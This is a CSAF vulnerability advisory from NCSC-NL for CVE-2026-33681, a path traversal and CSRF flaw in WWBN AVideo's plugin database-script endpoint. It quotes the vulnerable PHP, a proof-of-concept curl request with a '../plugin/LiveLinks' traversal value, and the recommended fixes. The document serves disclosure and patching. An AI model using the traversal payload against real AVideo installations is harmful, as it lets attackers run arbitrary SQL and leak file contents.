{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33681", "tracking": { "current_release_date": "2026-03-26T00:47:45.708039Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33681", "initial_release_date": "2026-03-24T13:51:29.945877Z", "revision_history": [ { "date": "2026-03-24T13:51:29.945877Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T13:51:40.830653Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-24T14:25:38.288936Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-24T14:25:40.993153Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:51:31.585556Z", "number": "5", "summary": "Unknown change." }, { "date": "2026-03-24T21:37:18.017361Z", "number": "6", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-24T21:37:32.741126Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-25T18:26:50.454392Z", "number": "8", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-25T18:26:58.071906Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-03-25T20:59:56.461808Z", "number": "10", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)." }, { "date": "2026-03-25T20:59:58.182983Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-26T00:47:42.371814Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (18).| Product Identifiers created (17).| References created (4).| CWES updated (1)." } ], "status": "interim", "version": "12" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=26.0", "product": { "name": "vers:unknown/<=26.0", "product_id": "CSAFPID-5893889", "product_identification_helper": { "cpe": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "AVideo" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/10.4", "product": { "name": "vers:unknown/10.4", "product_id": "CSAFPID-5656122", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.4" } } }, { "category": "product_version_range", "name": "vers:unknown/10.8", "product": { "name": "vers:unknown/10.8", "product_id": "CSAFPID-5656123", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@10.8" } } }, { "category": "product_version_range", "name": "vers:unknown/11", "product": { "name": "vers:unknown/11", "product_id": "CSAFPID-5656124", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1", "product": { "name": "vers:unknown/11.1", "product_id": "CSAFPID-5656125", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.1.1", "product": { "name": "vers:unknown/11.1.1", "product_id": "CSAFPID-5656126", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.1.1" } } }, { "category": "product_version_range", "name": "vers:unknown/11.5", "product": { "name": "vers:unknown/11.5", "product_id": "CSAFPID-5656127", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.5" } } }, { "category": "product_version_range", "name": "vers:unknown/11.6", "product": { "name": "vers:unknown/11.6", "product_id": "CSAFPID-5656128", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@11.6" } } }, { "category": "product_version_range", "name": "vers:unknown/12.4", "product": { "name": "vers:unknown/12.4", "product_id": "CSAFPID-5656129", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@12.4" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3", "product": { "name": "vers:unknown/14.3", "product_id": "CSAFPID-5656130", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3" } } }, { "category": "product_version_range", "name": "vers:unknown/14.3.1", "product": { "name": "vers:unknown/14.3.1", "product_id": "CSAFPID-5656131", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.3.1" } } }, { "category": "product_version_range", "name": "vers:unknown/14.4", "product": { "name": "vers:unknown/14.4", "product_id": "CSAFPID-5656132", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@14.4" } } }, { "category": "product_version_range", "name": "vers:unknown/18.0", "product": { "name": "vers:unknown/18.0", "product_id": "CSAFPID-5656133", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@18.0" } } }, { "category": "product_version_range", "name": "vers:unknown/21.0", "product": { "name": "vers:unknown/21.0", "product_id": "CSAFPID-5721197", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@21.0" } } }, { "category": "product_version_range", "name": "vers:unknown/22.0", "product": { "name": "vers:unknown/22.0", "product_id": "CSAFPID-5772271", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@22.0" } } }, { "category": "product_version_range", "name": "vers:unknown/24.0", "product": { "name": "vers:unknown/24.0", "product_id": "CSAFPID-5772272", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@24.0" } } }, { "category": "product_version_range", "name": "vers:unknown/25.0", "product": { "name": "vers:unknown/25.0", "product_id": "CSAFPID-5840723", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@25.0" } } }, { "category": "product_version_range", "name": "vers:unknown/26.0", "product": { "name": "vers:unknown/26.0", "product_id": "CSAFPID-5878928", "product_identification_helper": { "purl": "pkg:composer/wwbn/avideo@26.0" } } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<=26.0", "product": { "name": "vers:unknown/>=0|<=26.0", "product_id": "CSAFPID-5878929" } } ], "category": "product_name", "name": "avideo" } ], "category": "vendor", "name": "WWBN" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33681", "cwe": { "id": "CWE-22", "name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')" }, "notes": [ { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database. Commit 81b591c509835505cb9f298aa1162ac64c4152cb contains a patch.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33681" }, { "category": "description", "text": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database. Commit 81b591c509835505cb9f298aa1162ac64c4152cb contains a patch.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33681.json" }, { "category": "description", "text": "## Summary\n\nThe `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database.\n\n## Details\n\nThe vulnerable data flow:\n\n**1. Entry point** — `objects/pluginRunDatabaseScript.json.php:21`:\n```php\n$fileName = Plugin::getDatabaseFileName($_POST['name']);\n```\n\n**2. \"Sanitization\"** — `objects/plugin.php:343-354`:\n```php\npublic static function getDatabaseFileName($pluginName)\n{\n global $global;\n $pluginName = AVideoPlugin::fixName($pluginName); // line 347 — no-op\n $dir = $global['systemRootPath'] . \"plugin\";\n $filename = $dir . DIRECTORY_SEPARATOR . $pluginName . DIRECTORY_SEPARATOR . \"install\" . DIRECTORY_SEPARATOR . \"install.sql\";\n if (!file_exists($filename)) {\n return false;\n }\n return $filename;\n}\n```\n\n**3. The \"fix\"** — `plugin/AVideoPlugin.php:3184-3190`:\n```php\npublic static function fixName($name)\n{\n if ($name === 'Programs') {\n return 'PlayLists';\n }\n return $name; // Returns input unchanged for all other values\n}\n```\n\n**4. SQL execution** — `objects/pluginRunDatabaseScript.json.php:24-36`:\n```php\n$lines = file($fileName);\nforeach ($lines as $line) {\n // ...\n if (!$global['mysqli']->query($templine)) {\n $obj->msg = ('Error performing query \\'' . $templine . '\\': ' . $global['mysqli']->error);\n die($templine.' '.json_encode($obj)); // Leaks file content + SQL error\n }\n}\n```\n\nThe sibling endpoint `pluginRunUpdateScript.json.php` correctly routes through `AVideoPlugin::loadPlugin()` which sanitizes the name with `preg_replace('/[^0-9a-z_]/i', '', $name)` at `AVideoPlugin.php:395`. The vulnerable endpoint bypasses this sanitization entirely.\n\nAdditionally, the endpoint lacks CSRF token validation. The related `pluginImport.json.php` properly checks `isGlobalTokenValid()`, but `pluginRunDatabaseScript.json.php` does not, making it exploitable via cross-site request forgery against an authenticated admin.\n\n## PoC\n\n**Step 1: Direct exploitation (as admin)**\n\n```bash\n# Traverse to another plugin's install.sql (e.g., from CustomPlugin to LiveLinks)\ncurl -s -b \"PHPSESSID=\" \\\n -d \"name=../plugin/LiveLinks\" \\\n \"https://target.com/objects/pluginRunDatabaseScript.json.php\"\n```\n\nThis resolves to: `{root}/plugin/../plugin/LiveLinks/install/install.sql` and executes its SQL.\n\n**Step 2: CSRF exploitation (no direct admin access needed)**\n\nHost the following HTML on an attacker-controlled page and trick an admin into visiting it:\n\n```html\n\n\n
\n \n
\n\n\n\n```\n\n**Step 3: Information disclosure via error messages**\n\nIf the traversed SQL file contains invalid SQL, lines 32-33 leak the raw file content in the error response:\n```json\n{\"error\":true,\"msg\":\"Error performing query 'FILE CONTENT HERE': MySQL error...\"}\n```\n\n## Impact\n\n- **SQL injection via file inclusion**: An attacker can execute arbitrary SQL from any `install/install.sql` file reachable via path traversal, potentially creating admin accounts, modifying data, or extracting sensitive information.\n- **Information disclosure**: SQL execution errors leak raw file contents and MySQL error messages in the HTTP response.\n- **CSRF amplification**: The lack of CSRF protection means an external attacker can exploit this vulnerability by tricking an admin into visiting a malicious page, without needing direct admin credentials.\n- **Chaining potential**: If combined with any file-write primitive (e.g., GHSA-v8jw-8w5p-23g3, the plugin ZIP extraction RCE), an attacker can write a malicious `install.sql` file and then execute it via this endpoint.\n\n## Recommended Fix\n\nApply the same sanitization used by `loadPlugin()` to strip path traversal characters, and add CSRF token validation:\n\n```php\n// In objects/pluginRunDatabaseScript.json.php, after line 14:\n\n// Add CSRF protection\nif (!isGlobalTokenValid()) {\n die('{\"error\":\"' . __(\"Invalid token\") . '\"}');\n}\n\n// Sanitize plugin name before use (line 21)\n$pluginName = trim(preg_replace('/[^0-9a-z_]/i', '', $_POST['name']));\n$fileName = Plugin::getDatabaseFileName($pluginName);\n```\n\nAlternatively, fix `AVideoPlugin::fixName()` to apply proper sanitization for all callers:\n\n```php\npublic static function fixName($name)\n{\n if ($name === 'Programs') {\n $name = 'PlayLists';\n }\n return trim(preg_replace('/[^0-9a-z_]/i', '', $name));\n}\n```", "title": "github - https://api.github.com/advisories/GHSA-3hwv-x8g3-9qpr" }, { "category": "description", "text": "## Summary\n\nThe `objects/pluginRunDatabaseScript.json.php` endpoint accepts a `name` parameter via POST and passes it to `Plugin::getDatabaseFileName()` without any path traversal sanitization. This allows an authenticated admin (or an attacker via CSRF) to traverse outside the plugin directory and execute the contents of any `install/install.sql` file on the filesystem as raw SQL queries against the application database.\n\n## Details\n\nThe vulnerable data flow:\n\n**1. Entry point** — `objects/pluginRunDatabaseScript.json.php:21`:\n```php\n$fileName = Plugin::getDatabaseFileName($_POST['name']);\n```\n\n**2. \"Sanitization\"** — `objects/plugin.php:343-354`:\n```php\npublic static function getDatabaseFileName($pluginName)\n{\n global $global;\n $pluginName = AVideoPlugin::fixName($pluginName); // line 347 — no-op\n $dir = $global['systemRootPath'] . \"plugin\";\n $filename = $dir . DIRECTORY_SEPARATOR . $pluginName . DIRECTORY_SEPARATOR . \"install\" . DIRECTORY_SEPARATOR . \"install.sql\";\n if (!file_exists($filename)) {\n return false;\n }\n return $filename;\n}\n```\n\n**3. The \"fix\"** — `plugin/AVideoPlugin.php:3184-3190`:\n```php\npublic static function fixName($name)\n{\n if ($name === 'Programs') {\n return 'PlayLists';\n }\n return $name; // Returns input unchanged for all other values\n}\n```\n\n**4. SQL execution** — `objects/pluginRunDatabaseScript.json.php:24-36`:\n```php\n$lines = file($fileName);\nforeach ($lines as $line) {\n // ...\n if (!$global['mysqli']->query($templine)) {\n $obj->msg = ('Error performing query \\'' . $templine . '\\': ' . $global['mysqli']->error);\n die($templine.' '.json_encode($obj)); // Leaks file content + SQL error\n }\n}\n```\n\nThe sibling endpoint `pluginRunUpdateScript.json.php` correctly routes through `AVideoPlugin::loadPlugin()` which sanitizes the name with `preg_replace('/[^0-9a-z_]/i', '', $name)` at `AVideoPlugin.php:395`. The vulnerable endpoint bypasses this sanitization entirely.\n\nAdditionally, the endpoint lacks CSRF token validation. The related `pluginImport.json.php` properly checks `isGlobalTokenValid()`, but `pluginRunDatabaseScript.json.php` does not, making it exploitable via cross-site request forgery against an authenticated admin.\n\n## PoC\n\n**Step 1: Direct exploitation (as admin)**\n\n```bash\n# Traverse to another plugin's install.sql (e.g., from CustomPlugin to LiveLinks)\ncurl -s -b \"PHPSESSID=\" \\\n -d \"name=../plugin/LiveLinks\" \\\n \"https://target.com/objects/pluginRunDatabaseScript.json.php\"\n```\n\nThis resolves to: `{root}/plugin/../plugin/LiveLinks/install/install.sql` and executes its SQL.\n\n**Step 2: CSRF exploitation (no direct admin access needed)**\n\nHost the following HTML on an attacker-controlled page and trick an admin into visiting it:\n\n```html\n\n\n
\n \n
\n\n\n\n```\n\n**Step 3: Information disclosure via error messages**\n\nIf the traversed SQL file contains invalid SQL, lines 32-33 leak the raw file content in the error response:\n```json\n{\"error\":true,\"msg\":\"Error performing query 'FILE CONTENT HERE': MySQL error...\"}\n```\n\n## Impact\n\n- **SQL injection via file inclusion**: An attacker can execute arbitrary SQL from any `install/install.sql` file reachable via path traversal, potentially creating admin accounts, modifying data, or extracting sensitive information.\n- **Information disclosure**: SQL execution errors leak raw file contents and MySQL error messages in the HTTP response.\n- **CSRF amplification**: The lack of CSRF protection means an external attacker can exploit this vulnerability by tricking an admin into visiting a malicious page, without needing direct admin credentials.\n- **Chaining potential**: If combined with any file-write primitive (e.g., GHSA-v8jw-8w5p-23g3, the plugin ZIP extraction RCE), an attacker can write a malicious `install.sql` file and then execute it via this endpoint.\n\n## Recommended Fix\n\nApply the same sanitization used by `loadPlugin()` to strip path traversal characters, and add CSRF token validation:\n\n```php\n// In objects/pluginRunDatabaseScript.json.php, after line 14:\n\n// Add CSRF protection\nif (!isGlobalTokenValid()) {\n die('{\"error\":\"' . __(\"Invalid token\") . '\"}');\n}\n\n// Sanitize plugin name before use (line 21)\n$pluginName = trim(preg_replace('/[^0-9a-z_]/i', '', $_POST['name']));\n$fileName = Plugin::getDatabaseFileName($pluginName);\n```\n\nAlternatively, fix `AVideoPlugin::fixName()` to apply proper sanitization for all callers:\n\n```php\npublic static function fixName($name)\n{\n if ($name === 'Programs') {\n $name = 'PlayLists';\n }\n return trim(preg_replace('/[^0-9a-z_]/i', '', $name));\n}\n```", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-3hwv-x8g3-9qpr.json?alt=media" }, { "category": "other", "text": "0.00041", "title": "EPSS" }, { "category": "other", "text": "3.3", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, The value of the most recent CVSS (V3) score, There is exploit data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5893889", "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33681" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33681.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-3hwv-x8g3-9qpr" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Packagist%2FGHSA-3hwv-x8g3-9qpr.json?alt=media" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/commit/81b591c509835505cb9f298aa1162ac64c4152cb" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-3hwv-x8g3-9qpr" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33681" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/advisories/GHSA-v8jw-8w5p-23g3" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-3hwv-x8g3-9qpr" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5656122", "CSAFPID-5656123", "CSAFPID-5656124", "CSAFPID-5656125", "CSAFPID-5656126", "CSAFPID-5656127", "CSAFPID-5656128", "CSAFPID-5656129", "CSAFPID-5656130", "CSAFPID-5656131", "CSAFPID-5656132", "CSAFPID-5656133", "CSAFPID-5721197", "CSAFPID-5772271", "CSAFPID-5772272", "CSAFPID-5840723", "CSAFPID-5878928", "CSAFPID-5878929", "CSAFPID-5893889" ] } ], "title": "CVE-2026-33681" } ] }